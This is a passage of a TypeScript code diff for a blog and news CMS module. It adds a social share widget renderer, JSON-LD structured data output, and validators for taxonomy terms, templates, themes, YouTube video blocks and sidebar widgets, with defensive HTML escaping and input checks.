+    return [];
+  }
+
+  return STATIC_SHARE_LINK_BUILDERS.filter((entry) =>
+    entry.isEnabled(config)
+  ).map((entry) => ({
+    platform: entry.platform,
+    label: entry.label,
+    href: entry.buildHref(article)
+  }));
+}
+
+function renderInstagramNote(config: SocialShareRenderConfig): string {
+  if (!config.instagramNativeOnly) {
+    return "";
+  }
+
+  const message = config.native
+    ? "Instagram: use the Share button above, or Copy link."
+    : "Instagram: use Copy link to share this article.";
+
+  return `<p class="news-share__note">${escapeHtml(message)}</p>`;
+}
+
+/**
+ * Full public share widget for one article — the ONLY function route files
+ * (`/news/[slug].ts`, `/blog/[tenantCode]/[slug].ts`) need to call. Returns
+ * `""` (renders nothing) when `config.buttonsEnabled` is `false` or the
+ * canonical URL isn't safe — callers can splice the result straight into
+ * `bodyHtml` unconditionally.
+ *
+ * Native share and copy-link are rendered as `hidden`/plain `<button>`
+ * elements with `data-share-*` attributes read by `scriptSrc`
+ * (`public/js/news-share.js`, loaded same-origin via `<script src>` — never
+ * inline, so this widget adds zero new Content-Security-Policy surface: no
+ * hash/nonce bookkeeping, just an ordinary `'self'` same-origin script).
+ * That script progressively enhances: the native-share button starts
+ * `hidden` and is only revealed when `navigator.share` actually exists in a
+ * secure context (issue: "native share uses `navigator.share` only after
+ * user activation and only in secure context") — with JS disabled or
+ * unsupported, it silently stays hidden rather than rendering a dead
+ * button.
+ */
+export function renderSocialShareButtonsHtml(
+  article: SocialShareArticle,
+  config: SocialShareRenderConfig,
+  scriptSrc: string
+): string {
+  if (!config.buttonsEnabled || !isAbsoluteHttpUrl(article.canonicalUrl)) {
+    return "";
+  }
+
+  const staticLinks = buildSocialShareLinks(article, config);
+  const staticLinkItems = staticLinks
+    .map(
+      (link) =>
+        `<li><a class="news-share__link news-share__link--${escapeHtml(link.platform)}" href="${escapeHtml(link.href)}" target="_blank" rel="noopener noreferrer" aria-label="Share on ${escapeHtml(link.label)}">${escapeHtml(link.label)}</a></li>`
+    )
+    .join("\n");
+
+  const nativeItem = config.native
+    ? `<li><button type="button" class="news-share__native js-news-share-native" hidden data-share-url="${escapeHtml(article.canonicalUrl)}" data-share-title="${escapeHtml(article.title)}" data-share-text="${escapeHtml(shareText(article))}" aria-label="Share this article">Share</button></li>`
+    : "";
+
+  const copyItem = `<li><button type="button" class="news-share__copy js-news-share-copy" data-share-url="${escapeHtml(article.canonicalUrl)}" aria-label="Copy article link">Copy link</button></li>`;
+
+  return `<nav class="news-share" aria-label="Share this article">
+<ul class="news-share__list">
+${nativeItem}
+${copyItem}
+${staticLinkItems}
+</ul>
+<p class="news-share__status js-news-share-status" role="status" aria-live="polite" hidden></p>
+${renderInstagramNote(config)}
+<script src="${escapeHtml(scriptSrc)}" defer></script>
+</nav>`;
+}

--- a/src/modules/blog-content/domain/structured-data-rendering.ts
+++ b/src/modules/blog-content/domain/structured-data-rendering.ts
@@ -1,0 +1,114 @@
+/**
+ * `NewsArticle` (schema.org) JSON-LD structured data for public post detail
+ * pages (Issue #649, epic `news_portal`). Pure — takes already-resolved
+ * values (title/description/canonical URL/image URL+dimensions/author &
+ * publisher names/publisher logo URL/dates/taxonomy) and builds a plain
+ * object; `renderJsonLdScriptTag` below is the ONLY place that serializes it
+ * to a `<script>` tag, so there is exactly one point that has to get the
+ * HTML-injection escaping right.
+ *
+ * Every string value here is user-authored content (title, description, alt
+ * text, category/tag names) — "escape everything" (issue's own security
+ * note) is satisfied by `renderJsonLdScriptTag`'s serialization, NOT by
+ * pre-escaping fields here (`JSON.stringify` already produces valid JSON
+ * string literals for arbitrary text; the only extra risk specific to
+ * embedding JSON inside an HTML `<script>` element is the literal `</script>`
+ * sequence breaking out of the element, which `renderJsonLdScriptTag`
+ * neutralizes structurally, not through a denylist).
+ */
+export type NewsArticleImage = {
+  url: string;
+  width: number | null;
+  height: number | null;
+};
+
+export type NewsArticleJsonLdInput = {
+  headline: string;
+  description: string;
+  /** Already-resolved, safe absolute canonical URL (`seo-rendering.ts`'s `resolveCanonicalUrl`) — the caller only calls this builder when non-null. */
+  canonicalUrl: string;
+  /** Already-resolved verified R2 image (`social-preview-image-resolution.ts` + `NewsMediaPort`), or `null` to omit `image` entirely — never an unverified/local/external URL. */
+  image: NewsArticleImage | null;
+  datePublished: Date;
+  dateModified: Date;
+  /** Issue #649 design decision: organization-level byline (tenant/site name), NOT an individual editor's identity — this repo has no public-safe "author display name" concept today, and exposing internal user identity in public structured data would be a new PII surface out of this issue's scope. See the news-portal skill's §649 section for the full reasoning. */
+  authorName: string;
+  publisherName: string;
+  /** Best-effort — omitted when the tenant has no verified R2 fallback social image configured (Google's NewsArticle guidance recommends a publisher logo, but does not make it a hard requirement this repo can satisfy without a dedicated tenant-logo concept, which does not exist yet). */
+  publisherLogoUrl: string | null;
+  /** First category-taxonomy term name, if any (`article:section`, JSON-LD `articleSection`). */
+  articleSection: string | null;
+  /** Every other assigned category/tag term name (`article:tag`, JSON-LD `keywords`). */
+  tags: readonly string[];
+};
+
+export function buildNewsArticleJsonLd(
+  input: NewsArticleJsonLdInput
+): Record<string, unknown> {
+  const publisher: Record<string, unknown> = {
+    "@type": "Organization",
+    name: input.publisherName
+  };
+
+  if (input.publisherLogoUrl) {
+    publisher.logo = {
+      "@type": "ImageObject",
+      url: input.publisherLogoUrl
+    };
+  }
+
+  const data: Record<string, unknown> = {
+    "@context": "https://schema.org",
+    "@type": "NewsArticle",
+    headline: input.headline,
+    description: input.description,
+    datePublished: input.datePublished.toISOString(),
+    dateModified: input.dateModified.toISOString(),
+    author: {
+      "@type": "Organization",
+      name: input.authorName
+    },
+    publisher,
+    mainEntityOfPage: {
+      "@type": "WebPage",
+      "@id": input.canonicalUrl
+    }
+  };
+
+  if (input.image) {
+    data.image = {
+      "@type": "ImageObject",
+      url: input.image.url,
+      ...(input.image.width ? { width: input.image.width } : {}),
+      ...(input.image.height ? { height: input.image.height } : {})
+    };
+  }
+
+  if (input.articleSection) {
+    data.articleSection = input.articleSection;
+  }
+
+  if (input.tags.length > 0) {
+    data.keywords = input.tags.join(", ");
+  }
+
+  return data;
+}
+
+/**
+ * Serializes a JSON-LD object into a safe `<script type="application/ld+json">`
+ * tag. `JSON.stringify` already produces a valid JSON string (quotes/
+ * backslashes/control characters correctly escaped per the JSON spec) — the
+ * ONE additional risk specific to embedding JSON inside an HTML `<script>`
+ * element is a literal `</script` sequence inside a string value breaking
+ * out of the element early (this is not a JSON-escaping gap, it is an
+ * HTML-parser one: the browser's HTML tokenizer looks for `</script` before
+ * JavaScript/JSON parsing ever begins). Escaping EVERY `<` character (not
+ * just the exact `</script>` substring) closes this structurally — same
+ * "escape the whole class, not a denylist of exact strings" principle this
+ * repo's `escapeHtml` already uses for regular HTML text.
+ */
+export function renderJsonLdScriptTag(data: Record<string, unknown>): string {
+  const json = JSON.stringify(data).replace(/</g, "\\u003c");
+  return `<script type="application/ld+json">${json}</script>`;
+}

--- a/src/modules/blog-content/domain/taxonomy-policy.ts
+++ b/src/modules/blog-content/domain/taxonomy-policy.ts
@@ -1,0 +1,55 @@
+export type TaxonomyType = "category" | "tag";
+
+export const TAXONOMY_TYPES: readonly TaxonomyType[] = ["category", "tag"];
+
+export function isTaxonomyType(value: unknown): value is TaxonomyType {
+  return (
+    typeof value === "string" && (TAXONOMY_TYPES as string[]).includes(value)
+  );
+}
+
+export type ValidationError = {
+  field: string;
+  message: string;
+};
+
+export type TermParentValidationResult =
+  { valid: true } | { valid: false; errors: ValidationError[] };
+
+/**
+ * Enforces the two term-hierarchy rules from Issue #537/#539: a `tag` must
+ * never have a `parentId` (schema `CHECK` in
+ * `026_awcms_blog_content_schema.sql` backs this up at the DB level —
+ * this is the pre-insert application-layer check that returns a field-level
+ * error instead of a raw constraint violation), and a term can never be its
+ * own parent. Cross-taxonomy-type parents (a tag id used as a category's
+ * parent) and cycles beyond one level are Issue #539's admin-endpoint
+ * concern, once terms are actually mutable through an API.
+ */
+export function validateTermParent(
+  taxonomyType: TaxonomyType,
+  termId: string | null,
+  parentId: string | null | undefined
+): TermParentValidationResult {
+  const errors: ValidationError[] = [];
+
+  if (taxonomyType === "tag" && parentId != null) {
+    errors.push({
+      field: "parentId",
+      message: "A tag must not have a parentId."
+    });
+  }
+
+  if (parentId != null && termId != null && parentId === termId) {
+    errors.push({
+      field: "parentId",
+      message: "A term cannot be its own parent."
+    });
+  }
+
+  if (errors.length > 0) {
+    return { valid: false, errors };
+  }
+
+  return { valid: true };
+}

--- a/src/modules/blog-content/domain/template-policy.ts
+++ b/src/modules/blog-content/domain/template-policy.ts
@@ -1,0 +1,169 @@
+import { isValidSlug } from "./slug-policy";
+
+/**
+ * Templates (Issue #542 §Templates: "Support layout configuration...
+ * Template rendering must stay within safe predefined layout rules").
+ * `layoutJson` is a **whitelisted shape**, not arbitrary JSON — only the
+ * fields below are ever read by a renderer, so there is no path from a
+ * template row to executable script, matching the same "whitelist
+ * everything, no raw escape hatch" convention `content-block-rendering.ts`
+ * established for `content_json` (Issue #540).
+ */
+export type ValidationError = {
+  field: string;
+  message: string;
+};
+
+export type TemplateLayout = {
+  columns: 1 | 2 | 3;
+  sidebarPosition: "left" | "right" | "none";
+};
+
+const VALID_COLUMNS = new Set([1, 2, 3]);
+const VALID_SIDEBAR_POSITIONS = new Set(["left", "right", "none"]);
+
+function isNonEmptyString(value: unknown): value is string {
+  return typeof value === "string" && value.trim().length > 0;
+}
+
+export function validateTemplateLayout(
+  value: unknown
+): { valid: true; value: TemplateLayout } | { valid: false } {
+  if (typeof value !== "object" || value === null || Array.isArray(value)) {
+    return { valid: false };
+  }
+
+  const record = value as Record<string, unknown>;
+
+  if (
+    typeof record.columns !== "number" ||
+    !VALID_COLUMNS.has(record.columns) ||
+    typeof record.sidebarPosition !== "string" ||
+    !VALID_SIDEBAR_POSITIONS.has(record.sidebarPosition)
+  ) {
+    return { valid: false };
+  }
+
+  return {
+    valid: true,
+    value: {
+      columns: record.columns as 1 | 2 | 3,
+      sidebarPosition: record.sidebarPosition as "left" | "right" | "none"
+    }
+  };
+}
+
+export type CreateTemplateInput = {
+  key: string;
+  name: string;
+  layoutJson: TemplateLayout;
+  isActive: boolean;
+};
+
+export type CreateTemplateValidationResult =
+  | { valid: true; value: CreateTemplateInput }
+  | { valid: false; errors: ValidationError[] };
+
+export function validateCreateTemplateInput(
+  body: unknown
+): CreateTemplateValidationResult {
+  const record = (body ?? {}) as Record<string, unknown>;
+  const errors: ValidationError[] = [];
+
+  if (!isNonEmptyString(record.key) || !isValidSlug(record.key.trim())) {
+    errors.push({
+      field: "key",
+      message:
+        "key is required and must be lowercase alphanumeric segments separated by single hyphens."
+    });
+  }
+
+  if (!isNonEmptyString(record.name)) {
+    errors.push({ field: "name", message: "name is required." });
+  }
+
+  const layoutResult = validateTemplateLayout(record.layoutJson);
+
+  if (!layoutResult.valid) {
+    errors.push({
+      field: "layoutJson",
+      message:
+        "layoutJson must be { columns: 1|2|3, sidebarPosition: 'left'|'right'|'none' }."
+    });
+  }
+
+  if (errors.length > 0) {
+    return { valid: false, errors };
+  }
+
+  return {
+    valid: true,
+    value: {
+      key: (record.key as string).trim(),
+      name: (record.name as string).trim(),
+      layoutJson: (layoutResult as { valid: true; value: TemplateLayout })
+        .value,
+      isActive: record.isActive !== false
+    }
+  };
+}
+
+export type UpdateTemplateInput = {
+  name?: string;
+  layoutJson?: TemplateLayout;
+  isActive?: boolean;
+};
+
+export type UpdateTemplateValidationResult =
+  | { valid: true; value: UpdateTemplateInput }
+  | { valid: false; errors: ValidationError[] };
+
+export function validateUpdateTemplateInput(
+  body: unknown
+): UpdateTemplateValidationResult {
+  const record = (body ?? {}) as Record<string, unknown>;
+  const errors: ValidationError[] = [];
+  const value: UpdateTemplateInput = {};
+
+  if (record.name !== undefined) {
+    if (!isNonEmptyString(record.name)) {
+      errors.push({
+        field: "name",
+        message: "name must be a non-empty string."
+      });
+    } else {
+      value.name = record.name.trim();
+    }
+  }
+
+  if (record.layoutJson !== undefined) {
+    const layoutResult = validateTemplateLayout(record.layoutJson);
+
+    if (!layoutResult.valid) {
+      errors.push({
+        field: "layoutJson",
+        message:
+          "layoutJson must be { columns: 1|2|3, sidebarPosition: 'left'|'right'|'none' }."
+      });
+    } else {
+      value.layoutJson = layoutResult.value;
+    }
+  }
+
+  if (record.isActive !== undefined) {
+    if (typeof record.isActive !== "boolean") {
+      errors.push({
+        field: "isActive",
+        message: "isActive must be a boolean."
+      });
+    } else {
+      value.isActive = record.isActive;
+    }
+  }
+
+  if (errors.length > 0) {
+    return { valid: false, errors };
+  }
+
+  return { valid: true, value };
+}

--- a/src/modules/blog-content/domain/theme-policy.ts
+++ b/src/modules/blog-content/domain/theme-policy.ts
@@ -1,0 +1,57 @@
+/**
+ * Blog theme mode (Issue #542 §Theme Mode: "Support dark/light
+ * configuration at schema and rendering level. Respect existing
+ * theme/design-token approach if present."). Same three-value set as the
+ * base tenant-level theme (`awcms_tenants.default_theme`,
+ * `tenant-admin/domain/settings-validation.ts`'s `VALID_THEMES`) —
+ * deliberately not redefined as a shared import across modules (this repo
+ * has no cross-module domain-constant sharing convention), but kept
+ * value-identical so a blog override and the tenant default are always
+ * interchangeable.
+ */
+export type BlogThemeMode = "light" | "dark" | "system";
+
+export const BLOG_THEME_MODES: readonly BlogThemeMode[] = [
+  "light",
+  "dark",
+  "system"
+];
+
+export function isBlogThemeMode(value: unknown): value is BlogThemeMode {
+  return (
+    typeof value === "string" && (BLOG_THEME_MODES as string[]).includes(value)
+  );
+}
+
+export type ValidationError = {
+  field: string;
+  message: string;
+};
+
+export type UpdateThemeSettingsInput = {
+  mode: BlogThemeMode;
+};
+
+export type UpdateThemeSettingsValidationResult =
+  | { valid: true; value: UpdateThemeSettingsInput }
+  | { valid: false; errors: ValidationError[] };
+
+export function validateUpdateThemeSettingsInput(
+  body: unknown
+): UpdateThemeSettingsValidationResult {
+  const record = (body ?? {}) as Record<string, unknown>;
+
+  if (!isBlogThemeMode(record.mode)) {
+    return {
+      valid: false,
+      errors: [
+        {
+          field: "mode",
+          message: `mode must be one of ${BLOG_THEME_MODES.join(", ")}.`
+        }
+      ]
+    };
+  }
+
+  return { valid: true, value: { mode: record.mode } };
+}

--- a/src/modules/blog-content/domain/video-news-block-validation.ts
+++ b/src/modules/blog-content/domain/video-news-block-validation.ts
@@ -1,0 +1,321 @@
+/**
+ * Pure, write-time, UNCONDITIONAL validation/normalization of `video_news`
+ * content_json blocks (Issue #639, epic `news_portal`). Unlike the
+ * full-online-R2-only-mode-GATED `mediaObjectId` checks Issue #636 added
+ * for gallery images/featured media (`news-media-reference-gate.ts`,
+ * `content-block-media-references.ts`), the checks in this file are NOT
+ * conditioned on that mode being active for the tenant — the issue's own
+ * "Security notes" frame provider allowlisting and video ID/URL validation
+ * as unconditional embed-safety controls (treat video embeds as high-risk
+ * content, never store/render arbitrary iframe HTML), not an R2-storage
+ * policy decision that should only bind full-online-R2-only tenants.
+ *
+ * Only the custom thumbnail's EXISTENCE/verification (a real R2 media
+ * object reference, same policy as featured images and gallery images)
+ * is mode-gated — that half lives in the separate
+ * `application/video-news-thumbnail-reference-gate.ts` (mirrors
+ * `news-media-reference-gate.ts`'s split of "shape here, DB round trip
+ * there").
+ *
+ * "Video ID/URL must be validated and normalized server-side" (issue's own
+ * Rules) is implemented literally by `normalizeYouTubeVideoId`: whatever
+ * the client submits as `videoId` (a bare 11-character YouTube id, or a
+ * full YouTube URL in any of its common forms — `watch?v=`, `youtu.be/`,
+ * `/embed/`, `/shorts/`) is normalized down to the bare canonical id
+ * before ever being persisted; `contentJson` written to the database never
+ * contains the client's raw URL string.
+ *
+ * `validateAndNormalizeContentJsonVideoBlocks` also rebuilds every
+ * `video_news` block from ONLY its known, normalized fields rather than
+ * passing the client's object through — this means an attacker cannot
+ * smuggle an extra field (e.g. a `rawEmbedHtml`/`iframe` key) past this
+ * block type: even though `content-validation.ts`'s `containsUnsafeHtml`
+ * regex scan already rejects a literal `<script>`/`<iframe>`/`<embed>`/
+ * `<object>` substring anywhere in the stringified `contentJson`
+ * (Issue #538, unconditional, applies to every block type including this
+ * one), this whitelist reconstruction is a second, independent layer that
+ * makes an unrecognized key on a `video_news` block vanish rather than
+ * relying on pattern matching alone.
+ *
+ * Deliberately declares its own local `ValidationError` type rather than
+ * importing `content-validation.ts`'s structurally-identical one — same
+ * "small types are duplicated per file, not shared" convention
+ * `blog-post-validation.ts`/`blog-page-validation.ts` already use for
+ * `ValidationError`/the UUID regex, which keeps this file's collision
+ * surface with any other content-block-validation change to zero.
+ */
+
+export type ValidationError = {
+  field: string;
+  message: string;
+};
+
+/** Only provider allowlisted today (issue's own Scope: "Initial provider allowlist: youtube"). Adding a second provider later requires a corresponding `normalize*VideoId` function — see `normalizeYouTubeVideoId` below for the shape a new one would need. */
+export const VIDEO_NEWS_PROVIDERS = ["youtube"] as const;
+export type VideoNewsProvider = (typeof VIDEO_NEWS_PROVIDERS)[number];
+
+export function isVideoNewsProvider(
+  value: unknown
+): value is VideoNewsProvider {
+  return (
+    typeof value === "string" &&
+    (VIDEO_NEWS_PROVIDERS as readonly string[]).includes(value)
+  );
+}
+
+/** YouTube video ids are always exactly 11 characters of `[A-Za-z0-9_-]` — true for every current and historical YouTube video id format. */
+const YOUTUBE_VIDEO_ID_PATTERN = /^[A-Za-z0-9_-]{11}$/;
+
+/**
+ * Accepts a bare YouTube video id OR one of YouTube's common URL shapes and
+ * returns the normalized bare id, or `null` for anything else (malformed
+ * input, a non-YouTube host, a playlist-only link with no resolvable
+ * video id, etc.) — the caller rejects rather than guesses. Never executes
+ * a network request; this is pure string/URL parsing only.
+ */
+export function normalizeYouTubeVideoId(input: unknown): string | null {
+  if (typeof input !== "string") {
+    return null;
+  }
+
+  const trimmed = input.trim();
+
+  if (YOUTUBE_VIDEO_ID_PATTERN.test(trimmed)) {
+    return trimmed;
+  }
+
+  let url: URL;
+  try {
+    url = new URL(trimmed);
+  } catch {
+    return null;
+  }
+
+  if (url.protocol !== "http:" && url.protocol !== "https:") {
+    return null;
+  }
+
+  const host = url.hostname.toLowerCase().replace(/^www\./, "");
+
+  if (host === "youtu.be") {
+    const id = url.pathname.split("/").filter(Boolean)[0] ?? "";
+    return YOUTUBE_VIDEO_ID_PATTERN.test(id) ? id : null;
+  }
+
+  if (
+    host === "youtube.com" ||
+    host === "m.youtube.com" ||
+    host === "youtube-nocookie.com"
+  ) {
+    if (url.pathname === "/watch") {
+      const id = url.searchParams.get("v") ?? "";
+      return YOUTUBE_VIDEO_ID_PATTERN.test(id) ? id : null;
+    }
+
+    const match = url.pathname.match(/^\/(?:embed|shorts|v)\/([^/]+)/);
+    if (match) {
+      const id = match[1] ?? "";
+      return YOUTUBE_VIDEO_ID_PATTERN.test(id) ? id : null;
+    }
+  }
+
+  return null;
+}
+
+export type NormalizedVideoNewsBlock = {
+  type: "video_news";
+  provider: VideoNewsProvider;
+  videoId: string;
+  title?: string;
+  caption?: string;
+  /**
+   * Deliberately NOT format/existence-validated here — see this file's
+   * header comment. A non-string value is simply dropped (never persisted,
+   * never crashes the renderer, which independently type-checks it again
+   * anyway) rather than rejected outright, mirroring how gallery items'
+   * `mediaObjectId` is likewise untouched by any pure validator (Issue
+   * #636): outside full-online R2-only mode a malformed reference here is
+   * harmless — it just never resolves to anything at render time.
+   */
+  thumbnailMediaObjectId?: string;
+  durationSeconds?: number;
+  sourceLabel?: string;
+};
+
+const MAX_TITLE_LENGTH = 200;
+const MAX_CAPTION_LENGTH = 500;
+const MAX_SOURCE_LABEL_LENGTH = 120;
+/** Generous sanity bound (7 days), not a real editorial limit — just enough to reject obviously-bogus input (negative, non-integer, absurdly large) without imposing an arbitrary "real" duration cap. */
+const MAX_DURATION_SECONDS = 60 * 60 * 24 * 7;
+
+function isRecord(value: unknown): value is Record<string, unknown> {
+  return typeof value === "object" && value !== null && !Array.isArray(value);
+}
+
+function isRecordArray(value: unknown): value is Record<string, unknown>[] {
+  return Array.isArray(value) && value.every(isRecord);
+}
+
+function validateOptionalStringField(
+  value: unknown,
+  maxLength: number,
+  fieldPath: string,
+  fieldName: string,
+  errors: ValidationError[]
+): string | undefined {
+  if (value === undefined) {
+    return undefined;
+  }
+
+  if (typeof value !== "string" || value.length > maxLength) {
+    errors.push({
+      field: fieldPath,
+      message: `${fieldName} must be a string of at most ${maxLength} characters when provided.`
+    });
+    return undefined;
+  }
+
+  const trimmed = value.trim();
+  return trimmed.length > 0 ? trimmed : undefined;
+}
+
+function validateVideoNewsBlock(
+  block: Record<string, unknown>,
+  blockIndex: number
+): { errors: ValidationError[]; value: NormalizedVideoNewsBlock | null } {
+  const path = `contentJson.blocks[${blockIndex}]`;
+  const errors: ValidationError[] = [];
+
+  const providerValid = isVideoNewsProvider(block.provider);
+  if (!providerValid) {
+    errors.push({
+      field: `${path}.provider`,
+      message: `provider must be one of: ${VIDEO_NEWS_PROVIDERS.join(", ")}.`
+    });
+  }
+
+  // Only ever "youtube" today (the sole allowlisted provider) — skip
+  // videoId normalization entirely when provider itself was rejected,
+  // avoiding a confusing second error for the same root cause.
+  let videoId: string | null = null;
+  if (providerValid) {
+    videoId = normalizeYouTubeVideoId(block.videoId);
+    if (videoId === null) {
+      errors.push({
+        field: `${path}.videoId`,
+        message: "videoId must be a valid YouTube video id or video URL."
+      });
+    }
+  }
+
+  const title = validateOptionalStringField(
+    block.title,
+    MAX_TITLE_LENGTH,
+    `${path}.title`,
+    "title",
+    errors
+  );
+  const caption = validateOptionalStringField(
+    block.caption,
+    MAX_CAPTION_LENGTH,
+    `${path}.caption`,
+    "caption",
+    errors
+  );
+  const sourceLabel = validateOptionalStringField(
+    block.sourceLabel,
+    MAX_SOURCE_LABEL_LENGTH,
+    `${path}.sourceLabel`,
+    "sourceLabel",
+    errors
+  );
+
+  let durationSeconds: number | undefined;
+  if (block.durationSeconds !== undefined) {
+    if (
+      typeof block.durationSeconds !== "number" ||
+      !Number.isInteger(block.durationSeconds) ||
+      block.durationSeconds < 0 ||
+      block.durationSeconds > MAX_DURATION_SECONDS
+    ) {
+      errors.push({
+        field: `${path}.durationSeconds`,
+        message: `durationSeconds must be a non-negative integer of at most ${MAX_DURATION_SECONDS} when provided.`
+      });
+    } else {
+      durationSeconds = block.durationSeconds;
+    }
+  }
+
+  const thumbnailMediaObjectId =
+    typeof block.thumbnailMediaObjectId === "string" &&
+    block.thumbnailMediaObjectId.trim().length > 0
+      ? block.thumbnailMediaObjectId.trim()
+      : undefined;
+
+  if (errors.length > 0 || !providerValid || videoId === null) {
+    return { errors, value: null };
+  }
+
+  return {
+    errors: [],
+    value: {
+      type: "video_news",
+      provider: block.provider as VideoNewsProvider,
+      videoId,
+      ...(title !== undefined ? { title } : {}),
+      ...(caption !== undefined ? { caption } : {}),
+      ...(thumbnailMediaObjectId !== undefined
+        ? { thumbnailMediaObjectId }
+        : {}),
+      ...(durationSeconds !== undefined ? { durationSeconds } : {}),
+      ...(sourceLabel !== undefined ? { sourceLabel } : {})
+    }
+  };
+}
+
+export type ContentJsonVideoBlocksValidationResult =
+  | { valid: true; value: Record<string, unknown> }
+  | { valid: false; errors: ValidationError[] };
+
+/**
+ * Scans `contentJson.blocks` for `type === "video_news"` entries, validates
+ * each unconditionally (provider allowlist, videoId format/normalization,
+ * field shape/length), and returns a NEW `contentJson` with every
+ * `video_news` block rebuilt from only its known, normalized fields — never
+ * a straight passthrough of the client's raw block object. Every other
+ * block type (paragraph/heading/list/quote/gallery/unknown) passes through
+ * completely untouched — this function only ever looks at `video_news`
+ * blocks.
+ *
+ * Tolerant of a missing/non-array `blocks` (nothing to validate here,
+ * matching `content-validation.ts`'s own tolerance for that shape) — this
+ * is NOT the place that rejects a malformed `contentJson` overall, only
+ * `video_news` blocks within an otherwise-valid one.
+ */
+export function validateAndNormalizeContentJsonVideoBlocks(
+  contentJson: Record<string, unknown>
+): ContentJsonVideoBlocksValidationResult {
+  const blocks = contentJson.blocks;
+
+  if (!isRecordArray(blocks)) {
+    return { valid: true, value: contentJson };
+  }
+
+  const errors: ValidationError[] = [];
+  const normalizedBlocks = blocks.map((block, index) => {
+    if (block.type !== "video_news") {
+      return block;
+    }
+
+    const result = validateVideoNewsBlock(block, index);
+    errors.push(...result.errors);
+    return result.value ?? block;
+  });
+
+  if (errors.length > 0) {
+    return { valid: false, errors };
+  }
+
+  return { valid: true, value: { ...contentJson, blocks: normalizedBlocks } };
+}

--- a/src/modules/blog-content/domain/widget-policy.ts
+++ b/src/modules/blog-content/domain/widget-policy.ts
@@ -1,0 +1,184 @@
+import { containsUnsafeHtml } from "./content-validation";
+
+/**
+ * Widgets (Issue #542 §Widgets: "Support positions... Widget content must
+ * be safely rendered. Widget visibility must respect tenant isolation.").
+ * `bodyText` reuses `content-validation.ts`'s `containsUnsafeHtml` reject
+ * list (`<script>`/`<iframe>`/`<embed>`/`<object>`/inline handlers/
+ * `javascript:`) so this doesn't re-derive the same XSS rule a second time;
+ * rendering itself is plain-text-escaped, same convention
+ * `content-block-rendering.ts` established. Tenant isolation is RLS
+ * (`awcms_blog_widgets_tenant_isolation`), not an application-layer
+ * concern this file needs to re-enforce.
+ */
+export type WidgetPosition =
+  "header" | "sidebar" | "footer" | "content_before" | "content_after";
+
+export const WIDGET_POSITIONS: readonly WidgetPosition[] = [
+  "header",
+  "sidebar",
+  "footer",
+  "content_before",
+  "content_after"
+];
+
+export function isWidgetPosition(value: unknown): value is WidgetPosition {
+  return (
+    typeof value === "string" && (WIDGET_POSITIONS as string[]).includes(value)
+  );
+}
+
+export type ValidationError = {
+  field: string;
+  message: string;
+};
+
+function isNonEmptyString(value: unknown): value is string {
+  return typeof value === "string" && value.trim().length > 0;
+}
+
+export type CreateWidgetInput = {
+  position: WidgetPosition;
+  title: string;
+  bodyText: string;
+  isActive: boolean;
+  sortOrder: number;
+};
+
+export type CreateWidgetValidationResult =
+  | { valid: true; value: CreateWidgetInput }
+  | { valid: false; errors: ValidationError[] };
+
+export function validateCreateWidgetInput(
+  body: unknown
+): CreateWidgetValidationResult {
+  const record = (body ?? {}) as Record<string, unknown>;
+  const errors: ValidationError[] = [];
+
+  if (!isWidgetPosition(record.position)) {
+    errors.push({
+      field: "position",
+      message: `position must be one of ${WIDGET_POSITIONS.join(", ")}.`
+    });
+  }
+
+  if (!isNonEmptyString(record.title)) {
+    errors.push({ field: "title", message: "title is required." });
+  }
+
+  const bodyText = typeof record.bodyText === "string" ? record.bodyText : "";
+
+  if (bodyText.length > 0 && containsUnsafeHtml(bodyText)) {
+    errors.push({
+      field: "bodyText",
+      message:
+        "bodyText must not contain <script>, <iframe>, <embed>, <object>, inline event handler attributes, or javascript: URLs."
+    });
+  }
+
+  if (record.sortOrder !== undefined && typeof record.sortOrder !== "number") {
+    errors.push({
+      field: "sortOrder",
+      message: "sortOrder must be a number when provided."
+    });
+  }
+
+  if (errors.length > 0) {
+    return { valid: false, errors };
+  }
+
+  return {
+    valid: true,
+    value: {
+      position: record.position as WidgetPosition,
+      title: (record.title as string).trim(),
+      bodyText,
+      isActive: record.isActive !== false,
+      sortOrder: typeof record.sortOrder === "number" ? record.sortOrder : 0
+    }
+  };
+}
+
+export type UpdateWidgetInput = {
+  position?: WidgetPosition;
+  title?: string;
+  bodyText?: string;
+  isActive?: boolean;
+  sortOrder?: number;
+};
+
+export type UpdateWidgetValidationResult =
+  | { valid: true; value: UpdateWidgetInput }
+  | { valid: false; errors: ValidationError[] };
+
+export function validateUpdateWidgetInput(
+  body: unknown
+): UpdateWidgetValidationResult {
+  const record = (body ?? {}) as Record<string, unknown>;
+  const errors: ValidationError[] = [];
+  const value: UpdateWidgetInput = {};
+
+  if (record.position !== undefined) {
+    if (!isWidgetPosition(record.position)) {
+      errors.push({
+        field: "position",
+        message: `position must be one of ${WIDGET_POSITIONS.join(", ")}.`
+      });
+    } else {
+      value.position = record.position;
+    }
+  }
+
+  if (record.title !== undefined) {
+    if (!isNonEmptyString(record.title)) {
+      errors.push({
+        field: "title",
+        message: "title must be a non-empty string."
+      });
+    } else {
+      value.title = record.title.trim();
+    }
+  }
+
+  if (record.bodyText !== undefined) {
+    if (typeof record.bodyText !== "string") {
+      errors.push({ field: "bodyText", message: "bodyText must be a string." });
+    } else if (containsUnsafeHtml(record.bodyText)) {
+      errors.push({
+        field: "bodyText",
+        message:
+          "bodyText must not contain <script>, <iframe>, <embed>, <object>, inline event handler attributes, or javascript: URLs."
+      });
+    } else {
+      value.bodyText = record.bodyText;
+    }
+  }
+
+  if (record.isActive !== undefined) {
+    if (typeof record.isActive !== "boolean") {
+      errors.push({
+        field: "isActive",
+        message: "isActive must be a boolean."
+      });
+    } else {
+      value.isActive = record.isActive;
+    }
+  }
+
+  if (record.sortOrder !== undefined) {
+    if (typeof record.sortOrder !== "number") {
+      errors.push({
+        field: "sortOrder",
+        message: "sortOrder must be a number."
+      });
+    } else {
+      value.sortOrder = record.sortOrder;
+    }
+  }
+
+  if (errors.length > 0) {
+    return { valid: false, errors };
+  }
+
+  return { valid: true, value };
+}

--- a/src/modules/blog-content/module.ts
+++ b/src/modules/blog-content/module.ts
@@ -1,0 +1,332 @@
+import { defineModule } from "../_shared/module-contract";
+
+export const blogContentModule = defineModule({
+  key: "blog_content",
+  name: "Blog Content",
+  version: "0.9.0",
+  status: "active",
+  description:
